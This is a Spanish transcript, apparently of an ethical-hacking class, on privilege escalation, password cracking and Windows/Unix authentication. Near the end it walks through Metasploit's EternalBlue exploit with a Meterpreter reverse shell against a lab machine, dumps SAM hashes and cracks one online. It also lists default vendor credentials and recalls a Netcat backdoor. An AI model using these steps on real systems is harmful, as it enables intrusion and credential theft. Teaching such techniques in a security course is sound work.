Buenas tardes a todos, bienvenidos a la clase o a la continuación de la clase del día sábado. Estamos tratando el tema de la explotación de vulnerabilidades y la escalada de privilegios. Ya digamos que logramos a través de exploits, como habíamos dicho, pues a lograr control sobre una máquina Windows en particular, y logramos establecer una puerta trasera dentro de esa máquina con la herramienta Netcat para poder conectarnos pues a futuro posteriormente todas las veces que lo lleguemos a necesitar. Vamos a ver ahora el tema de elevación de privilegios. Básicamente lo que vamos a hacer es tratar de identificar técnicas que se pueden utilizar para, si no soy un usuario administrador, pues poder volverme o identificar credenciales de usuarios administradores o credenciales de otros usuarios incluso, que pueden servirme para acceder a los recursos que estos usuarios tengan dentro de sus archivos, dentro de sus carpetas, ¿listo? De manera particular. Entonces vamos a pasar al tema de escalada de privilegios. Bueno, entonces, básicamente, ¿en qué consiste normalmente la escalada de privilegios? Se debe utilizar pues cuando tenemos acceso a un sistema, pero ese acceso no se logra con un usuario administrador, sino que el usuario como tal no es de tipo administrador y hay que tratar de volvernos administradores para poder cubrir esos recursos. Entonces puede obtenerse pues debido a fallas de diseño, errores de programación, bugs, configuraciones deficientes, etcétera, dentro de los sistemas, dentro de los software, los sistemas de información específica, exactamente. Entonces, esto permitirá al atacante visualizar información sensible o crítica, eliminar archivos, instalar malware, etcétera. Con el uso del exploit de Eternal Blue que trabajamos en la clase, digamos que ya automáticamente adquirimos un privilegio de administrador. Pero de todas formas, pues digamos que con el uso del otro, exploit que utilizamos, pues el privilegio es limitado a un usuario limitado. Y en ese caso, pues deberíamos buscar técnicas que nos permitan escalar o subir privilegios a usuarios administradores. Si el sistema, digamos que Windows, tiene sus falencias, pues hay exploits que nos permiten escalar a ese nivel de privilegios, ¿oyeron? En cuanto a la adquisición de permisos de usuario administrador. Entonces, ¿cómo podemos realizar esa escalada de privilegios? Pues localizar usuarios administradores sin contraseña. Es probable que en algunos casos, si utilizando por ejemplo el script que les mostré que hice en Python la vez pasada, pues podemos hacer un barrido y buscar usuarios administradores que no tengan contraseñas o que tengan contraseñas muy débiles, en cuyo caso pues con esa herramienta basado en el uso del recurso compartido IPC, pues podríamos obtener credenciales en una máquina Windows. El acceso físico a los equipos. ¿Listo? Entonces estamos físicamente sobre la máquina Linux, por ejemplo, y podremos reiniciarla y arrancar el modo mono usuario y con eso cambiar la contraseña del administrador. En el caso de Windows, utilizando herramientas de arranque alterno como herramientas como Acronix, a través de un pendrive, por ejemplo, podemos arrancar nuestra máquina y desde ahí leer el archivo SAM del sistema operativo y eliminar, por ejemplo, la credencial de alguno de los usuarios administradores o del usuario administrador. Y si está deshabilitado, pues habilitarlo e ingresar con este usuario. Por eso es que es necesario proteger el acceso físico a las máquinas a través de técnicas de password cracking que nos permitan, pues, tratar de capturar estos datos. ¿Sí? Podríamos incluso, pues si tenemos acceso físico a la computadora Windows, reiniciar con estos discos externos que les había comentado, Acronis o incluso una plataforma Linux y jalar el archivo SAM para después revisarlo más adelante. Aunque toca también jalar el syskey que se utiliza como mecanismo de seguridad precisamente para evitar que se jalen esos archivos. A través de herramientas de malware, ¿sí? La instalación de keyloggers dentro de una computadora, el uso de spywares que espíen y que capturen toda la información que se maneje dentro de esa computadora y se la envíen a, ¿cómo es que se llama? A la máquina. El uso de herramientas, por ejemplo, herramientas de cómputo forense que te permiten escanear el contenido de la memoria RAM de una computadora,
es probable que los accesos que tú hayas gestionado hacia aplicaciones queden registrados en esa memoria RAM de esa computadora. Obviamente ahí se van a registrar así como tú los digitaste, o sea, sin cifrado y sin nada. Y pues también se podría sacar de ahí, pero ya pues como siempre tocaría acceso físico al equipo. El uso de pendrives con ya scripts que permitan ese tipo de actividades para poder tú extraer toda esa información y que se le monte, por ejemplo, un software que extraiga el contenido del archivo SAMO, que extraiga los hashes ¿cómo es que se llama? De los usuarios. Una de las técnicas más utilizadas para este tipo de obtención de contraseñas son las técnicas de password cracking. ¿Sí? Son técnicas utilizadas para obtener los passwords de los usuarios, o sea, para tratar de romper esos passwords. La efectividad de la técnica dependerá de qué tan débil es la contraseña o qué tan fácil de utilizar, de qué tan fácil es esa contraseña que está usando esta persona. Anteriormente yo les mostré a ustedes un sitio web donde existía una base de datos de una gran cantidad de sitios donde se habían robado credenciales de usuario. Y obviamente, pues si tu correo estaba registrado en ese sitio, lo mejor era que cambiaras las contraseñas. Entonces podemos utilizar técnicas tanto tecnológicas como no tecnológicas para hacer estas actividades de password cracking. No tecnológicos, por ejemplo, ingeniería social, hacer shoulder surfing, o sea, hasta ponerte detrás y tratar de espiar a ver qué está escribiendo la persona. De esa manera, pues tú puedes ahí obtener, viendo lo que él está tecleando, pues obtienes su credencial, o incluso en muchos equipos hemos encontrado los famosos post-its pegados con contraseñas o debajo de los teclados. Digamos que son los primeros sitios donde por lo general uno busca. Para técnicas para protegerse de esta ingeniería social, por ejemplo, para saber cuando hay alguien detrás de ti, hay algunos computadores a los que les ponen unos pequeños espejitos en todas las esquinas de los monitores. Estos espejos tienen como finalidad que tú veas si hay alguien detrás tuyo. Dumpster diving, que es buscar ya en la basura. En la basura muchas veces botan mucha información, agendas con datos de usuarios, contraseñas. Entonces, digamos que hay que destruir todo eso antes de botarlo. Ataques online activos basados en técnicas, por ejemplo, como fuerza bruta o ataques de diccionario. Técnicas de phishing para engañar a la persona para que te entregue esa información a través, por ejemplo, de un sitio web falsificado. El uso de keyloggers, software espía, como ya habíamos hablado. Tratar de adivinar la contraseña. Tendría que ser muy débil y, bueno, tener a través de un conocimiento muy claro de la persona, pues podrías tratar de adivinar su contraseña. Ataques online pasivos, que son más que todo de escucha, pues esnifiar la red. El problema es que muchos de estos ataques en la actualidad ya no son tan eficientes, los ataques de man in the middle, debido a que se han implementado técnicas para proteger esas autenticaciones. Aunque si la conexión viene desde una página HTTP, pues sí es posible capturar esa información por, por técnicas como las de hombre en el medio. Ataques offline ya son fuera de línea, que se basan más que todo en ataques de fuerza bruta o de diccionario, teniendo ya los archivos de hash, habiéndolos descargados. Ataques de tablas arcoíris o rainbow tables, que no es más que una lista de hashes precomputados ya con las contraseñas respectivas asociadas a dichos hashes. Y distribuidos en la red, pues básicamente es como tratar de, entre múltiples máquinas al mismo tiempo, atacar a ese archivo de contraseñas para, digamos que disminuir el tiempo de obtención de la credencial. Obviamente tienes que distribuir la herramienta de software para que no intenten todas al mismo tiempo las mismas credenciales. Entonces, básicamente es ejecutar estos ataques, pero orientados a múltiples máquinas atacando al mismo tiempo para tratar de obtener dichas credenciales. La forma de protegernos de los ataques online, por ejemplo, para evitar técnicas como fuerza bruta, es
limitar el número de intentos que los usuarios tienen para registrar las contraseñas. ¿Okay? Entonces, de esa manera, ya la persona no va a estar intentando varias veces hasta que pueda. Ya contra el phishing, aquí sí lo que toca es concienciación, señores. Concientizar a las personas de que, hey, no den esa información, que sospechen de todos esos mensajes raros que les pueden llegar. Keyloggers y spyware, pues con un buen anti-malware te proteges contra ese tipo de técnicas. ¿Ya? Adivinar la contraseña, pues la protección ahí es no usar contraseñas muy sencillas digamos, que puedan adivinártelas fácilmente por conocimientos que tengan tuyos. Y ya contra los online pasivos, pues ahí sí ya toca implementar protocolos de seguridad dentro de las comunicaciones para garantizar que no te estén olfateando y snifeando la red o ejecutando técnicas de estos hombres en el medio. Y ataques offline, pues no permitir que se lleven tus archivos, no protegerlos. Los archivos de claves por lo general están protegidos, pero digamos que, pues si tú permites el acceso físico a las máquinas o permites, por ejemplo, en el caso de la vulnerabilidad del Eternal Blue, pues no la tienes parchada, pues se te van a llevar las claves, se te van a llevar esos archivos. Vamos a mostrarles ahora cómo podríamos sacar estos hashes de la máquina Windows desde el Kali con el exploit del Eternal Blue. Entonces, fuerza bruta y diccionario, ¿cuál es la diferencia? El ataque de fuerza bruta consiste simplemente en comenzar a probar combinaciones de caracteres hasta dar con la contraseña. O sea, no es que yo tenga una lista de claves como si sería un ataque de diccionario, sino que yo simplemente comienzo a pruebo, ensayo y error hasta que doy con la clave. Si no hay un límite en el intento de contraseñas y tenemos cierta información asociada a la credencial para poder cerrar, ¿sí?, ese espacio de claves posibles para probar, el ataque de fuerza bruta puede ser efectivo. Normalmente va a encontrar la contraseña porque consistirá en comenzar a probar una gran cantidad de intentos posibles con todos los tipos de combinaciones que tú hayas definido que vas a utilizar. Ya con el ataque de diccionario, pues tienes una lista de claves. Esa lista de posibles contraseñas, obviamente entre más grande sea, es porque tenemos una mayor cantidad de posibles contraseñas. Y si tu contraseña se encuentra en ese diccionario, pues la encontraron. Y el basado en reglas es ya cuando tú tienes cierta información sobre la contraseña y tú comienzas a limitar los ataques de fuerza bruta y los ataques de diccionario. Estos sitios web vienen ya con una lista de contraseñas por defecto de múltiples fabricantes. Recuerden que los fabricantes le implementan estos mecanismos de autenticación por defecto a todos sus sistemas para que cuando el usuario los compre, los adquiera, pues leyendo el manual pueda acceder fácilmente al proceso de administración del recurso y te lo recomiendan y ahí mismo está en el manual. No he visto hasta ahora un solo manual que no le diga al usuario que debe cambiar esa contraseña. Pero muchas veces no lo hacen. Ya yo se los he dicho, hemos encontrado en muchos lados accesos a cámaras y a teléfonos y todo esto que tienen contraseñas por defecto. Porque normalmente se preocupan por conectarla. Mira, esta es la IP y aquí te puedes conectar. Entonces ahí tenemos una lista de diferentes sitios. Vámonos a defaultpassword.info, por ejemplo. Bueno, aquí tenemos una lista clasificada por fabricantes. Miren, con orden alfabético tenemos una gran cantidad de fabricantes aquí. Y simplemente es comenzar a buscar nuestro producto. Por ejemplo, un equipo Alcatel. Vamos aquí a Alcatel. Y aquí están los diferentes servicios que tienen en estos sistemas. Bueno, vamos a decir que es un OmniStack 6024. Es un modelo de switch que ellos tienen. Y aquí está usuario por defecto admin. Y el password, yo nada más le digo show me. Y aquí él me dice que el password por defecto es switch. ¿Ven? Acceso administrador, incluso vía Telnet también lo tiene habilitado. Entonces, aquí incluso yo puedo votar, me sirvió, no me sirvió. ¿Ya ven? Entonces, aquí, ¿qué sucede? Que estamos viendo esta carita.
esta carita está seria, o sea que le ha servido a un grupo sí y a otros no le ha servido. Pues hay que tener claro que debemos saber y estar seguros de haber escogido el recurso, el tipo correcto y que no le hayan cambiado la contraseña por defecto. ¿Ya? Porque si no estoy seguro y estoy probando esto y no me funciona, entonces yo voy a decir, no, sabes que esa clave del switch no me funcionó. Yo lo voy a votar que no, pero espérate, si tú ni siquiera estás seguro de si de verdad te funcionó o no. Por ejemplo, aquí tenemos a Cisco. Y aquí tenemos los diferentes recursos. Cisco Ironet 1100. Dice que tiene una contraseña. Aquí alguien puso una carita feliz. Nada. No tiene nombre de usuario. Y el password es Cisco. Conectándose vía HTTP. Entonces, aquí hay una lista de contraseñas. Solamente tienes que buscar. Ahora, si no, entonces tú puedes colocar por aquí, por ejemplo, contraseña por defecto o, mejor en inglés, default password. Sería que vamos a poner and in. Vamos a ponerlo así. Eso es un modelo de teléfonos. Grand Street Network Default Password. Y esperamos a que cargue. Era con D, lo puse con T. Y aquí hay diferentes modelos de Grand Stream con sus usuarios y contraseñas por defecto. ¿Sí ven? Entonces, digamos que ahí tenemos una lista y esa es una forma de buscar los contraseñas por defecto de algunos recursos. Obviamente tengo que conocer y tengo que saber cuál es el recurso. Muchas veces al intentar ingresar me sale el modelo, me sale la referencia del dispositivo con el que me quiero conectar. Entonces, así como este, pues hay muchos sitios que nos pueden servir para este tipo de localizar contraseñas por defecto en los sistemas. Las Rainbow Tables son las tablas arcoíris, entonces son unas tablas ya con hashes precomputados, o sea, quiere decir precalculados con anterioridad. Simplemente se construye un archivo de una gran cantidad de posibles contraseñas y se les aplica el algoritmo de hash específico que utilizan en los sistemas de cómputo. Y listo, ya tenemos ahí nuestros hashes precomputados. ¿Qué viene a ser un hash, señores? Un hash es el resultado de aplicar una función matemática irreversible sobre un texto, digámoslo así, sobre un archivo, sobre lo que tú quieras. Y te permitirá construir una cadena de texto de tamaño fijo, según el tipo de algoritmo de hash utilizado, que va a ser el mismo siempre y cuando se repitan las mismas credenciales. Hay gente que confunde esto con criptografía. Tiene cierta relación, pero no es específicamente criptografía como tal. Entonces, cuando nosotros ejecutamos o construimos nuestros sitios, por ejemplo, en nuestras bases de datos y colocamos la contraseña de los usuarios, pues hay unas malas prácticas que hacen algunos y es que dejan la clave por defecto así, en texto plano. ¿Sí? Sí lo han hecho, hay gente que lo hace así, pues no sé, simplicidad. Uno creyera que en estos momentos ya eso la gente no debería hacerlo, pero sí lo hacen, sí se puede hacer. Uno nunca debe descartar nada ni decir, no, yo no creo que eso vayan a tener, eh, digamos que vayan a tener eso sin seguridad. Pues sí puede llegar a pasar. Les comento, una vez estaba saliendo del centro comercial, del portal,
y uno de los vigilantes, pues no sé si lo que él estaba haciendo era correcto o no, no me parece, estaba intentando abrir las puertas de los carros porque al parecer estaban dando denuncias de que se estaban robando las cosas en el parqueadero. Y él encontró de los, bueno, vi 3 carros de lo que él intentó ahí, uno tenía la puerta abierta. ¿Ya? Entonces, eso es lo que hace un delincuente primero que todo. O sea, yo no me voy a poner a sacar las ganzúas para tratar de abrir la cerradura, no. Primero, el experto primero intenta ver si la puerta está abierta. Entonces, uno no puede asegurar y jurar de que no, que ahora mismo todos los programadores del mundo utilizan algoritmos de hash para guardar sus contraseñas. ¿Ya? Puede que no. Entonces, cuando tú ejecutas el algoritmo de hash, por ejemplo, si usas MD5, pues todas las claves van a ser del mismo tamaño y eso sí, si tienes 2 claves iguales, te va a generar el mismo hash. Ahora, no se recomienda ya usar MD5, se recomienda mejor usar SHA-256 hacia arriba, ya que MD5 es altamente colisionable. Eso quiere decir que existen una gran cantidad de hash, de códigos de texto, de claves, que pueden generar el mismo hash. Entonces lo que necesitas obtener no es el hash correcto, perdón, no es la clave correcta, sino la que te genere el mismo hash. Y en ese caso, Profe, pues, dígame. si no estoy mal, pienso que también recomiendan en el caso de cuando utilizamos MD5 para, digamos, formular un hash, después de que pase el dato o se genere el hash, utilizar otro método para volver a sacar un hash del nuevo hash. No sé si me di a entender. Por Sí, sí, ejemplo, claro. yo aplico sobre una... ¿Ah? Ah, sigue. Sí, por ejemplo, si yo escribo la palabra hola y utilizando MD5 genero el hash. Después ese hash generado lo vuelvo a regenerar con otro método. Sería, por ejemplo, SHA, no sé si SHA-256 es o SHA-1. ¿Es correcto eso, profe? Sí, todo eso son técnicas que se pueden implementar. ¿Ven? Okay. Entonces, hay técnicas que se aplican, por ejemplo, el uso de una palabra adicional que le agregan a la, a la clave tuya, ¿verdad? Para generar un hash, digamos que asociado no exactamente a la palabra que tú estás usando, sino a una palabra adicional que está almacenada en el servidor. ¿Ya? De tal manera que si alguien se llega a llevar los hashes y comienza a tratar de aplicarle fuerza bruta a esos hashes porque tu equipo lo limita a 3 intentos o porque no estás permitiendo, digamos, que se ejecuten esas actividades de fuerza bruta, y él quiere llevarse eso a su casa para donde tiene su ambiente controlado y ahí hace todas las pruebas que quiere, porque logró llevarse los archivos de hash de esa máquina, pues se presenta el inconveniente de que no va a encontrar el hash, porque el hash, o no, bueno, puede que sí lo encuentre, por fuerza bruta puede que encuentre el hash, pero el hash normalmente no va a ser la clave correcta, sino va a ser la clave correcta más una palabra adicional que está almacenada en el servidor. Entonces, si él encuentra el hash correcto y encuentra la clave y la intenta probar directamente desde el sitio, no le va a servir porque la va a combinar después, el sitio la va a combinar después con esa palabra que él tiene incluido allá dentro de su sistema y automáticamente le va a generar un hash completamente distinto. Entonces, son mecanismos de protección. Algo que vi una vez en una universidad, que estábamos haciendo unas actividades, fue una técnica muy buena, bueno, nos pareció muy buena, en donde ellos, todas las contraseñas se codifican y se manejan con 4 caracteres. Nada más 4 caracteres, es lo que siempre vimos ahí. Entonces, ¿qué pasaba? Que te salía en la pantalla de tu navegador un tablero de conversiones. ¿Sí? Una tablita con todas las letras y todos los números que podías tener en tu contraseña. Entonces, si tú sabías tu clave era hola,
Entonces tú reemplazabas hola por las letras que te aparecieron dentro de esa tablita, de verdad. Y esa tablita al parecer es dinámica. Entonces tú no vas a poner hola en la clave, sino que tú vas a poner los números que le corresponden a la palabra hola en particular. Nos pareció un O sea buen que la mecanismo. contraseña cambiaba. Capturamos. ¿Cómo? O sea que la contraseña cambiaba entonces constantemente. Con cada conexión, exactamente. Entonces, ¿qué pasaba? Que nosotros capturamos varias credenciales y ninguna funcionaba. Afortunadamente, capturamos tráfico de la creación de una credencial. Yo alcancé a capturar el tráfico cuando estaban creando un usuario. Y ahí sí la clave es la clave exacta. ¿Ya? Entonces, ahí ese fue el único en el que pudimos ingresar. Entonces, aparte de tener que implementar HTTPS para que yo no pudiera haber hecho eso, pues esa técnica dinámica de gestión de claves, pues me pareció muy buena. Entonces, las Rainbow Tables no son más que un archivo de texto en donde están los algoritmos ya de hash precomputados contra las palabras que se utilizaron y que generaron esos hashes. Entonces, esa es una tabla arcoíris. Entonces, obviamente estos ataques son mucho más rápidos porque tú simplemente buscas el hash, lo encuentras y te vas en la horizontal y encuentras cuál fue la palabra que utilizaron para generar ese hash. Los procesos de autenticación en Microsoft, ¿cómo se manejan? Pues Microsoft, si es para el manejo de autenticación local, utiliza un archivo llamado SAM, el Security Accounts Manager, el administrador de cuentas de seguridad, que no es más que un archivo de texto que es de lectura bastante restringida, que contiene los usuarios, los identificadores de los usuarios, lo que se conoce como el UID del usuario, el identificador, las contraseñas en dos estructuras, una antigua llamada LM hash y la que se utiliza en la actualidad, que es la NTLM hash, y otros parámetros adicionales asociados a la contraseña, ¿sí? Que ya son la fecha de expiración y todos otros parámetros ya propios del sistema. Entonces, esa estructura así como la que se ve en la pantalla. Y está ubicado en la carpeta C Windows 732 config SAM. ¿Listo? Entonces, las contraseñas del usuario SAM se almacenan utilizando protocolos de autenticación de tipo, en la actualidad, NTLM, ¿sí? Anteriormente se usaba LAN Manager o LM, pero era se volvió muy inseguro. Y con contraseñas inferiores a 7 caracteres, digamos que el sistema sigue trabajando con el formato LM. Así que no se recomienda utilizar contraseñas de menos de 7 caracteres. Y lo que se utiliza es NTLM. En sistemas que ya se implementan basados en controladores de dominio, ahí se puede implementar una autenticación basada en Kerberos. Bueno, ¿cómo es la autenticación basada en NTLM en un controlador de dominio? Ya no en el archivo local. Bueno, tenemos al cliente, ¿verdad?, que escribe su usuario y su contraseña. A ese usuario se le aplica el hash, ¿verdad? El hash implementado para extraer el código y mandárselo al usuario. ¿Ya? Se le manda la solicitud de login con la información del usuario y la contraseña o el hash de la contraseña para no mandar la contraseña en texto plano a través de la red. Listo, ya yo lo recibo. Ah, muy bien, perfecto. Pero espérate, que no hemos terminado porque yo tengo que manejar otro mecanismo adicional para asegurarme de que tú eres tú. Entonces, te mando un valor específico conocido como desafío. ¿Sí? Esta es una técnica de desafío-respuesta. Entonces, tú, tomando como base ese desafío, que puede ser este conjunto de palabras que te mando aquí, ¿verdad? Y los datos de tu conexión, de tu usuario, tú generas una respuesta a ese desafío. O sea, te mandan un conjunto de caracteres y tú aplicas un algoritmo particular que te va a generar una respuesta. No va a ser la misma, o sea, tú respondes al desafío. Y acá el controlador de dominio ejecuta el mismo algoritmo con la información respectiva tuya y
y de los parámetros específicos del algoritmo que definimos cuando tú te conectaste por primera vez conmigo y listo. Entonces ahí yo valido si la respuesta es correcta, tú sí eres tú y puedes autenticarte contra mí. ¿Listo? Entonces esa es una técnica que se utiliza en sistemas Microsoft basado en el sistema de desafío. Ahora, ¿qué pasa con el sistema Kerberos? Ya esto es un mecanismo de autenticación mucho más robusto. Esto fue inventado en el Instituto Tecnológico de Massachusetts. En este caso tenemos un sistema que nos va a permitir autenticarnos contra cualquier aplicación. O sea, este sistema va a ser el sistema de autenticación para cualquier servicio al que tú quieras acceder dentro de la organización. Entonces tenemos el centro de distribución de llaves que tiene el servidor de autenticación y un servidor para la entrega de etiquetes, ¿sí? Que se van a utilizar para garantizar la conexión y que te puedas autenticar después contra el servidor de aplicaciones contra el que quieres trabajar, ¿sí? Servidor web, servidor DNS, el que quieras utilizar contra el que te estés autenticando, un controlador de dominio, no sé. Ahora, es probable que todo esté en la misma máquina, claro que sí, o sea, estos son servicios y los servicios pueden estar en la misma máquina. O puede que lo tengas en un servicio distinto, en una máquina diferente, por ejemplo, en un servidor de autenticación que se basa en un dominio contra un recurso de Wi-Fi. Entonces tienes el servidor de Wi-Fi por un lado y tienes el servidor Radius que te va a permitir esa autenticación contra ese servidor Kerberos para poder, digamos que validar que tú sí eres tú con tus credenciales. Entonces el usuario solicita el proceso de autenticación, ¿verdad? Él ya tiene sus credenciales aquí, pero él no las manda. Él solicita el servicio de autenticación y este señor le manda una información cifrada con su información de usuario y contraseña, ¿sí? Con unos parámetros adicionales. Él con esa información solicita un tiquete acá a este señor, cifrándolo con los datos que él tiene de su cuenta, y este señor le responde a esa solicitud y le manda, y digamos que el proceso internamente es un poco más complejo, ¿verdad? Entonces, el tiquete que él te manda lo vas a utilizar para autenticarte contra el servicio de aplicaciones que está aquí, ¿ya? Entonces, tú te solicitas esta autenticación por acá y él te va a responder en este caso. O sea, el sistema no te va a lograr mandar estos tiquetes a menos que tú hayas cifrado de manera correcta la información con los parámetros de llaves asociados a esta conexión. Porque si no puedes descifrar el mensaje es porque tú no tienes la información de la llave necesaria para descifrar las comunicaciones. Aquí en realidad se mandan dos mensajes, este señor responde con dos mensajes más, luego manda dos mensajes más aquí te responde, o sea, digamos que el proceso es bastante complejo en su estructura, buscando todo esto, una autenticación lo más segura posible. Entonces, Kerberos es ese sistema que se utiliza para proteger este tipo de comunicaciones y es, digamos que, ideal para que tengas un sistema de autenticación centralizado contra cualquier application server que tú manejes dentro de tu empresa. En Unix se usan mecanismos muy parecidos. Ahora, la autenticación en sistemas Unix, en máquinas GNU Linux, tenemos, por ejemplo, el esquema clásico, que es el uso del archivo passwd, el etc/passwd, que contiene el usuario, la contraseña, el nombre de usuario. Obviamente tiene el hash de la contraseña. No, mentira, en Linux no se usa específicamente el hash. Ellos utilizan un algoritmo de cifrado llamado Blowfish, que te generan hash diferentes para cada usuario. Ahí sí el usuario es distinto. Entonces, digamos que existen técnicas que te permiten obtener esas credenciales a través de técnicas de fuerza bruta, por ejemplo, con programas como John the Ripper, tú podrías, digamos que acceder a esa información. Ahora, un mecanismo que se implementó, que se utiliza en la actualidad para mejorar un poco la seguridad de este sistema, es el uso de un archivo Shadow. Ese archivo Shadow es un archivo en donde sacaron las contraseñas del archivo passwd, el cual sigue existiendo, pero ahora las contraseñas están en un archivo Shadow, al cual solo el root puede leer, más nadie puede leer ese archivo.
lo que complica un poco más el acceso a este tipo de información. O el uso de los métodos de autenticación por conexión, son los Pluggable Authentication Method o los PAM. Es una interfaz modular que permite que tú puedas autenticarte con cualquier proceso dentro del sistema de manera independiente, no importa qué proceso o qué servicio estás utilizando. Entonces, por ejemplo, puedes autenticarte por un login al sistema, por FTP, por Telnet, por cualquier aplicación que se autentique. Y tú te comunicas con las APIs de las librerías PAM. Ellos tienen su base de datos de configuraciones donde gestionan toda una pila de procesos para lo que es la autenticación del servicio, la gestión de las cuentas de los usuarios como tal, la gestión de las sesiones de comunicación que se establezcan dentro del sistema y el módulo de gestión de contraseñas o de password acá dentro del sistema. Entonces, esto hace que tú puedas conectarte de manera independiente con ese servicio sin importar qué recurso estés utilizando. Estos módulos se cargan en diferentes órdenes según la configuración especial que se haga aquí en el archivo pam.com, porque estos parámetros se apilan uno debajo del otro. Entonces, ya digamos que administrador pues configurará el archivo pam.com para determinar cómo se van a apilar estos recursos para el acceso a cada uno de estos procesos como tal, o cuál incluso no vamos a manejar. Entonces, digamos que son las formas que se tienen para autenticarse contra estos sistemas Windows o contra estos sistemas Unix. Lo que vamos a hacer nosotros es jalar los archivos locales, que es la técnica más común en los equipos clientes, por ejemplo. Ahora, ¿qué son los factores de autenticación? Ya pensando un poco más en la seguridad del sistema y en también cómo vulnerar esa seguridad. Actualmente tener simplemente un usuario y una contraseña no es seguro, porque te pueden haber robado esa información de alguna manera. Entonces, no se debería utilizar un solo factor de autenticación para proteger nuestros datos. Tenemos que utilizar un segundo factor adicional al que manejemos de manera convencional. De tal forma que, listo, me obtuviste mi credencial, obtuviste mi usuario y mi contraseña, pero te falta esta llave que yo tengo acá, o este archivo que yo tengo aparte, o este software en mi celular, o esta tarjetita que yo tengo por acá, que me genera unos códigos aleatorios, digámoslo así. Entonces, digamos que hay que tener todo esto en cuenta como una segunda opción para autenticarte. Tienes que pasar las dos autenticaciones, por lo menos las dos, para tú poder garantizar que sí eres tú. Esto se puede basar, por ejemplo, en algo que se sabe. O sea, una contraseña, algo que tú te sabes, que tú te aprendiste. Un usuario y una clave, un número de PIN, etc. Algo que se tiene. O sea, algo físico que tú tienes en tu poder. Un carnet, ¿cierto? Un token bancario, una aplicación en el celular. Algo que eres. Ya esto es biometría. La huella digital, la voz, el rostro, el iris. El lugar donde estás, ya esto es por geolocalización. Si no estás ubicado en el computador no está ubicado en el lugar correcto, geográficamente hablando, a través de GPS, no te dejo conectar. Algo que haces, ya esto es hacer diferentes operaciones para poder autenticarte contra un sistema. Por ejemplo, una técnica de protección que se utilizaba o que se utiliza para el acceso al servicio SSH, que es un servicio de administración remota de una máquina Unix, por lo general, porque Windows no ha implementado todavía SSH, así como quien dice, para sus conexiones, porque ellos todavía manejan Telnet, aunque por lo general está deshabilitado, y lo que es escritorio remoto. Pero aunque las conexiones de escritorio remoto van cifradas, ¿oyeron? Entonces, esa técnica que se utilizaba o que se utiliza en SSH se llama port knocking o tocar la puerta. Digamos que se adució como una especie de clave para tocar cuando tú vayas a entrar.
Cuando tú haces, por ejemplo, algo como esto, y esa es tu clave. Si colocas ese sonido de la manera correcta y en los tiempos correctos, listo. Si eres tú, puedes pasar. Obviamente esa clave es muy básica, la que yo utilicé. Es muy conocida esa forma de tocar. Pero ¿cómo se implementa esto en SSH, por ejemplo? Sencillo, haces un salto de puertos. O sea, no te vas a conectar directamente con el puerto 22 de una, sino que te vas al puerto 4000 por un segundo. Luego al segundo siguiente intentas en el puerto 5000. Luego intentas en el 327. Luego intentas en el 5432 y luego intentas en el 22. En unos intervalos de tiempo particulares para complicar un poco más la cosa. Entonces, si logras cubrir ese salto de puertos en los tiempos correctos y en los puertos correctos, te dejo conectarte al final en el puerto 22. Si no, no. ¿Sí? Eso sería una autenticación por algo que tú haces. Bueno, entonces pasemos, señores, a la parte práctica de actividades asociadas a password cracking. Vamos a pasarnos primero a la máquina Kali Linux. Bueno, entonces arrancamos el Postgres, porque yo reinicié esta máquina. Si ustedes no la han apagado, no, déjenla así, ya ustedes están bien. Listo, ya la base de datos fue inicializada, así que le decimos msf console. Listo, pues nos volvemos a conectar. Use exploit /windows smb /ms17-010-eternal blue, y con eso ya selecciono el exploit nuevamente. Definimos los parámetros que ya sabemos: set rhost, máquina Windows 192.168.1.149, es la IP mía, ¿no? Set kilowatt Windows x64 Meterpreter reverse -tcp. Y el host, la IP local, set lhost, esta sí en plural, en singular, y 192.168.1.114, que son las IPs de mi máquina Windows, de mi máquina Kali. Y listo, ya estoy preparado, exploit. Muy bien, entonces lo que vamos a hacer es traernos los hash del archivo SAM. ¿Listo? Entonces le podemos decir run y hash, desde ahí donde estamos, hash dump, para que corra la herramienta hash dump y trate de traerse el contenido del archivo SAM. ¿Sí? Obtuvo las palabras reservadas para el inicio de la contraseña y obtuvo el syskey que se asocia al SAM para la protección de la contraseña contra el robo del archivo SAM. Bueno, listo. Entonces aquí tenemos la información del archivo SAM con los datos de los usuarios y las diferentes credenciales que tenemos acá. Entonces aquí tenemos las LM y las NTLM de este lado. Entonces vamos a seleccionar por ejemplo, el de María. Vamos a seleccionar lo que está después de los dos puntos, aquí este pedacito de aquí, este hash, y lo vamos a copiar. Y vamos a irnos a un sitio web aquí en Firefox que se llama crackstation.net.
Crackstation.net. ¿Listo? Como craquear estación. Y ahí, aquí en este cuadro, pegamos el hash. Soporta LM, NTLM, MD2, MD4, MD5, todos estos MD5 sobre MD5X. ¿Sí? Entonces, SHA, MySQL 4.1 superior. Entonces, una vez lo pegamos aquí, le decimos no soy un robot y respondemos al desafío que nos pone. Seleccione los puentes. Puente, puente y este también es puente. Verificar. Listo. Y le decimos craquear hash. Listo, aquí está. ADM 123. Entonces, él aquí nos está indicando que usa unas tablas masivas con unos passwords que ya han sido, con unos hashes de password ya craqueados. O sea que está utilizando una Rainbow Tables, una tabla arcoíris, para hacer esas actividades. Listo, muy bien. Entonces, digamos que ahí ya tuvimos el archivo, lo bajamos. Si copiamos eso, lo pasamos a un archivo de texto, nos lo llevamos y vamos a pasarnos entonces ahora a nuestra máquina Windows. Vamos a utilizar una herramienta llamada Cain, que se utiliza también para este tipo de operaciones. Bueno, ahora vamos a desarrollar actividades de password cracking con una herramienta conocida como Cain o Cain y Abel, que le dicen también. Entonces, ya en su máquina Windows, ustedes ya tienen instalada la herramienta, solamente hay que abrirla y le decimos pues que sigue. Porque de manera local tú tienes los usuarios administradores, digámoslo así, porque esta herramienta corre como usuario administrador. Cainabel es una herramienta que sirve para muchas actividades. Eso sí, actualmente todos los anti-malwares la detectan como software malicioso y no te la dejan instalar. ¿Bien? Entonces, ¿por qué? Por todas las actividades que ella puede hacer. Puede olfatear la red, puede vienen a hacer ataques para decodificación de información, lo que es detectar con equipos en la red de Windows, snifear la red, hacer trace routes, ¿sí? Hacking de redes Wi-Fi. Y el que nos interesa ahora mismo es el de Cracker, que es para tratar de romper las credenciales de, miren, una gran cantidad de posibles sistemas que ellos pueden utilizar. ¿Sí ven? MySQL, Oracle, WPA, ¿sí? de redes Wi-Fi. Entonces, digamos que vamos a tratar de, así como hicimos con el usuario María, obtener la credencial de esos usuarios utilizando esta herramienta. Voy a maximizar aquí. Y vamos a decirle ahora mismo acá, en este panel que está del lado derecho, ¿sí? Le vamos a decir clic derecho, Add to List, para decirle que vamos a traer los hashes del archivo SAM en este caso. Entonces, aquí tengo esta opción, importar 